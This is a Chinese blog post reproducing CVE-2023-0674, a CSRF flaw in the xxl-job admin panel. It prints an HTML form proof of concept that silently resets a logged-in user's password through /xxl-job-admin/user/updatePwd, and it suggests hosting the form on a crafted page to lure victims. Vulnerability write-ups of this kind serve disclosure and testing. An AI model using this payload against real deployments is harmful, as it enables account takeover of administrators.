当前位置: 首页 > news >正文

CVE-2023-0674 漏洞复现

        前半个月在渗透测试中遇到了xxl-job框架的CSRF漏洞,网上也没有对应的复现帖子,然后我就提交了CVE,今天终于有回复了,可惜被人抢先了,那我就来写一下复现过程吧。

在搭建好的xxl-job框架中,点击修改密码,更新密码,对其抓包

然后在burp或者yakit中生成CSRF的poc(在数据包处右键,一键生成)

下面是我在yakit上生成的poc

<html>
<body>
<form action="http://xxx.xxx.xxx.xxx/xxl-job-admin/user/updatePwd" method="POST" name="form1" enctype="application/x-www-form-urlencoded" >
<input type="hidden" name="password" value="123456"/>
<input type="submit" value="Submit request" />
</form>
<script>history.pushState('', '', '/');</script>
</body>
</html>

将这段poc放到精心构造的网站上,诱导用户在登录状态下点击

要怎么构造就看各位自由发挥了,我这是最简陋的一个点击框

在用户登录状态下点击按钮,就会完成CSRF攻击

      

此时密码已经更换为poc中设置的密码

重新登陆可以验证是否已修改成功

虽然不是高危漏洞,但是第一次提交CVE,还是挺开心的。

可惜被抢先一步,哈哈哈哈哈,继续努力

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Keil下载烧录程序到单片机提示flash outtime超时
  • [Docker]当下实测可用Docker镜像源
  • Mybatis链路分析:JDK动态代理和责任链模式的应用
  • 终于!有人总结了大模型学习资料!零基础入门到精通,收藏这一篇就够了
  • 目标跟踪算法——ByteTrack算法原理解析
  • MySQL唯一索引大小写敏感性问题及字符集深入解析
  • leetcode 902. Numbers At Most N Given Digit Set
  • 小程序获取自定义tabbar高度踩坑
  • MARK图像处理与计算机视觉基础,经典以及最近发展
  • C++:构造函数、析构函数
  • VTK平面切割
  • Spring 框架下 Redis 数据结构的全面解析
  • 【Unity小工具】Image组件宽度、高度自适应
  • 【Google Play】X浏览器4.8.1国际版(如何鉴别是否官方?)
  • 掌握 SQL 数据操纵的基础技巧
  • 《Java编程思想》读书笔记-对象导论
  • create-react-app做的留言板
  • CSS 三角实现
  • ES学习笔记(10)--ES6中的函数和数组补漏
  • Java多态
  • JSONP原理
  • leetcode-27. Remove Element
  • node.js
  • php中curl和soap方式请求服务超时问题
  • seaborn 安装成功 + ImportError: DLL load failed: 找不到指定的模块 问题解决
  • use Google search engine
  • vagrant 添加本地 box 安装 laravel homestead
  • win10下安装mysql5.7
  • 记录:CentOS7.2配置LNMP环境记录
  • 前端
  • 浅谈web中前端模板引擎的使用
  • 人脸识别最新开发经验demo
  • 腾讯大梁:DevOps最后一棒,有效构建海量运营的持续反馈能力
  • 网络应用优化——时延与带宽
  • 回归生活:清理微信公众号
  • 交换综合实验一
  • 如何通过报表单元格右键控制报表跳转到不同链接地址 ...
  • 智能情侣枕Pillow Talk,倾听彼此的心跳
  • ​【C语言】长篇详解,字符系列篇3-----strstr,strtok,strerror字符串函数的使用【图文详解​】
  • ​VRRP 虚拟路由冗余协议(华为)
  • ​力扣解法汇总1802. 有界数组中指定下标处的最大值
  • ​无人机石油管道巡检方案新亮点:灵活准确又高效
  • # 20155222 2016-2017-2 《Java程序设计》第5周学习总结
  • ###C语言程序设计-----C语言学习(6)#
  • #if等命令的学习
  • (2024最新)CentOS 7上在线安装MySQL 5.7|喂饭级教程
  • (rabbitmq的高级特性)消息可靠性
  • (每日持续更新)信息系统项目管理(第四版)(高级项目管理)考试重点整理第3章 信息系统治理(一)
  • (四) Graphivz 颜色选择
  • (原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
  • (轉貼) VS2005 快捷键 (初級) (.NET) (Visual Studio)
  • (自用)仿写程序
  • ****** 二 ******、软设笔记【数据结构】-KMP算法、树、二叉树
  • .naturalWidth 和naturalHeight属性,
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案